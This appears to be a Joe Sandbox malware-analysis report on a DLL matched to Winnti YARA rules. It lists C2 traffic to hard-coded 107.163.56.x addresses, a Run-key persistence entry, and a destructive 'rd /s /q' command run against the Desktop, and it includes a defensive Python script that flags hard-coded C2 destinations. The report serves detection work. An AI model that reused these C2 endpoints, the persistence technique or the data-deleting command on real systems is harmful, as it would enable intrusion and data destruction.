Source: unknown | TCP traffic detected without corresponding DNS query: 107.163.56.231 (4 occurrences in the original listing)
Source: unknown | TCP traffic detected without corresponding DNS query: 107.163.56.110 (5 occurrences in the original listing)
Source: unknown | TCP traffic detected without corresponding DNS query: 107.163.56.251 (3 occurrences in the original listing)
Source: unknown | TCP traffic detected without corresponding DNS query: 107.163.56.232 (38 occurrences in the original listing)
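The four destinations above are all hard-coded addresses in 107.163.56.0/24 that the sample contacts without ever resolving a name, which is what the "TCP traffic detected without corresponding DNS query" signature keys on; the "connects to many ports of the same IP" signature in the overview is the same data viewed per destination. The script below reproduces both checks over a constructed event stream. It is an added example, not part of the Joe Sandbox report or of the sample: the destination addresses echo the report, but the DNS answer (203.0.113.10, a TEST-NET address), the extra ports on 107.163.56.232 and the fan-out threshold of three ports are placeholders chosen for illustration.

```python
"""Correlate DNS answers with TCP connections to find hard-coded C2 destinations.

Added example (not from the sandbox report). Reproduces the logic behind
"TCP traffic without corresponding DNS query" and "connects to many ports of
the same IP": any TCP destination that was never returned in a DNS answer
earlier in the capture is reported, unresolved destinations are grouped by /24,
and per-IP port fan-out is measured against an assumed threshold.
"""
import ipaddress
from collections import defaultdict

# Constructed events (time in seconds since capture start). The 107.163.56.x
# addresses mirror the report; the DNS answer and the ports 18964/18965 are
# placeholders and do not claim anything about the real sample.
EVENTS = [
    {"t": 0.0, "kind": "dns", "qname": "blog.sina.com.cn", "answers": ["203.0.113.10"]},
    {"t": 0.2, "kind": "tcp", "dst": "203.0.113.10", "dport": 80},
    {"t": 1.0, "kind": "tcp", "dst": "107.163.56.231", "dport": 18530},
    {"t": 1.5, "kind": "tcp", "dst": "107.163.56.110", "dport": 18530},
    {"t": 2.0, "kind": "tcp", "dst": "107.163.56.251", "dport": 18530},
    {"t": 3.0, "kind": "tcp", "dst": "107.163.56.232", "dport": 18963},
    {"t": 3.5, "kind": "tcp", "dst": "107.163.56.232", "dport": 18964},
    {"t": 4.0, "kind": "tcp", "dst": "107.163.56.232", "dport": 18965},
    {"t": 4.5, "kind": "tcp", "dst": "107.163.56.232", "dport": 18963},
]

PORT_FANOUT_THRESHOLD = 3  # assumption: distinct ports per IP before we call it fan-out


def correlate(events, fanout_threshold=PORT_FANOUT_THRESHOLD):
    """Return unresolved destinations, their /24 grouping and per-IP port fan-out."""
    resolved = set()                 # every IP seen in a DNS answer so far
    unresolved = set()               # (ip, port) pairs contacted without a prior answer
    ports_by_ip = defaultdict(set)   # distinct destination ports per IP

    # Process in time order so a DNS answer only "covers" later connections.
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["kind"] == "dns":
            resolved.update(ev["answers"])
        elif ev["kind"] == "tcp":
            ports_by_ip[ev["dst"]].add(ev["dport"])
            if ev["dst"] not in resolved:
                unresolved.add((ev["dst"], ev["dport"]))

    # Hard-coded C2 infrastructure tends to cluster in one netblock, so group by /24.
    subnets = defaultdict(set)
    for ip, _ in unresolved:
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        subnets[str(net)].add(ip)

    fanout = {ip: sorted(ports) for ip, ports in ports_by_ip.items()
              if len(ports) >= fanout_threshold}

    return {
        "unresolved": sorted(unresolved),
        "subnets": {net: sorted(ips) for net, ips in subnets.items()},
        "port_fanout": fanout,
    }


if __name__ == "__main__":
    report = correlate(EVENTS)
    for ip, port in report["unresolved"]:
        print(f"no DNS answer for {ip}:{port}")
    for net, ips in report["subnets"].items():
        print(f"{net}: {len(ips)} unresolved hosts")
    for ip, ports in report["port_fanout"].items():
        print(f"{ip} contacted on {len(ports)} distinct ports: {ports}")
```

On a real capture the resolved set should also be seeded with the analysis host's DNS cache and hosts file, and IP literals learned from HTTP redirects or from the C2 response itself (the sample here reads http://107.163.56.231:18530/ out of memory rather than from DNS) will still show up as unresolved; that is the intended result, since an IP that arrives through any channel other than DNS is exactly what this check is meant to surface.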
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_10003F41 InternetReadFile, 4_2_10003F41
Source: global traffic | HTTP traffic detected: GET /u/5762479093 HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) | Host: blog.sina.com.cn | Connection: Keep-Alive (this entry appears 5 times in the original listing)
Source: global traffic | HTTP traffic detected: GET //joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC@ HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible) | Host: 107.163.56.231:18530 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /u1129.html HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 | Host: 107.163.56.110:18530 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /main.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 | Host: 107.163.56.232:18963 | Cache-Control: no-cache (this entry appears 68 times in the original listing)
Source: global traffic | HTTP traffic detected: GET /u/5762479093 HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) | Host: blog.sina.com.cn (this entry appears 33 times in the original listing)
Source: global traffic | DNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.56.110:18530/u1129.html
Source: rundll32.exe, 00000004.00000002.3141638484.0000000002FAC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://107.163.56.231:1530//joy.asp?sid=rungnejcndvgnJgFe5vteX8v29
Source: rundll32.exe, rundll32.exe, 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://107.163.56.231:18530/
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.56.231:18530//joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC
Source: rundll32.exe, rundll32.exe, 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://107.163.56.232:18963/main.php
Source: rundll32.exe, 00000004.00000002.3144079935.000000000516C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000345D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1882444552.0000000003466000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880827011.0000000005167000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://beacon.sina.com.cn/a.gif?noScript
Source: rundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 00000004.00000003.2820845242.000000000346A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2821196346.000000000346A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
Source: rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.4.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?523df019e3ad1
Source: rundll32.exe, 00000004.00000002.3144079935.000000000516C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000345D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1882444552.0000000003466000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880827011.0000000005167000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880865322.0000000005165000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://portrait6.sinaimg.cn/5762479093/blog/180
Source: Amcache.hve.14.dr | String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2419824510.0000000006569000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://blog.sina.com.cn/
Source: rundll32.exe, 00000004.00000003.2331159571.000000000346F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://blog.sina.com.cn/user
Source: rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.000000000346A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2129869017.0000000003454000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://blog.sina.com.cn/u/5762479093
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49824 version: TLS 1.2

System Summary

barindex
Source: 2JSGOlbNym.dll, type: SAMPLE | Matched rule: Winnti sample - file NlaifSvc.dll | Author: Florian Roth
Source: 19.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Winnti sample - file NlaifSvc.dll | Author: Florian Roth
Source: 11.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Winnti sample - file NlaifSvc.dll | Author: Florian Roth
Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Winnti sample - file NlaifSvc.dll | Author: Florian Roth
Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_10008AD0 DeviceIoControl
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_10003F63 ExitWindowsEx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10003F63 ExitWindowsEx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_10003F63 ExitWindowsEx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_1000B247
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_1000B730
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_1000AEE3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1000B247
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1000B730
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1000AEE3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_1000B247
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_1000B730
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_1000AEE3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10009148 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 1000CDB0 appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10001000 appears 912 times
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 672
Source: 2JSGOlbNym.dll | Binary or memory string: OriginalFilenameSHLWAPI.DLL~/ vs 2JSGOlbNym.dll
Source: 2JSGOlbNym.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: 2JSGOlbNym.dll, type: SAMPLE | Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 19.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine | Classification label: mal100.troj.spyw.evad.winDLL@42/12@1/6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_1000404F AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1000404F AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_1000404F AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_10003FB7 CreateToolhelp32Snapshot
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\Desktop\12091507
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\107.163.56.251:6658
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3656:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\M107.163.56.251:6658
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4356
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3732
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\39bf17a7-ec06-4943-ba4f-d97b125659e1
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObject
Source: 2JSGOlbNym.dll | ReversingLabs: Detection: 89%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObject
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,InputFile
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,PrintFile
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 672
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",InputFile
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",PrintFile
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 672
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: mfc42.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: msvcp60.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: avicap32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: msvfw32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2351563967.0000000003488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*V source: rundll32.exe, 00000004.00000003.2331092028.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*k source: rundll32.exe, 00000004.00000003.2331092028.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: rundll32.exe, 00000004.00000003.2298221763.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\*.*.*I source: rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: rundll32.exe, 00000004.00000003.2272862369.000000000342C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2474003270.0000000003488000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2353062409.0000000003488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*e source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*T7 source: rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948360391.000000000346D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2272781039.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000004.00000003.2271634293.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271351006.0000000003448000.00000004.00000020.00020000.00000000.sdmp
Source: initial sample | Static PE information: section where entry point is pointing to: .tyi1
Source: 2JSGOlbNym.dll | Static PE information: section name: .tyi0
Source: 2JSGOlbNym.dll | Static PE information: section name: .tyi1
Source: 2JSGOlbNym.dll | Static PE information: section name: .tyi1 entropy: 7.938472536073559

Boot Survival

Source: C:\Windows\SysWOW64\rundll32.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run COAPI

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
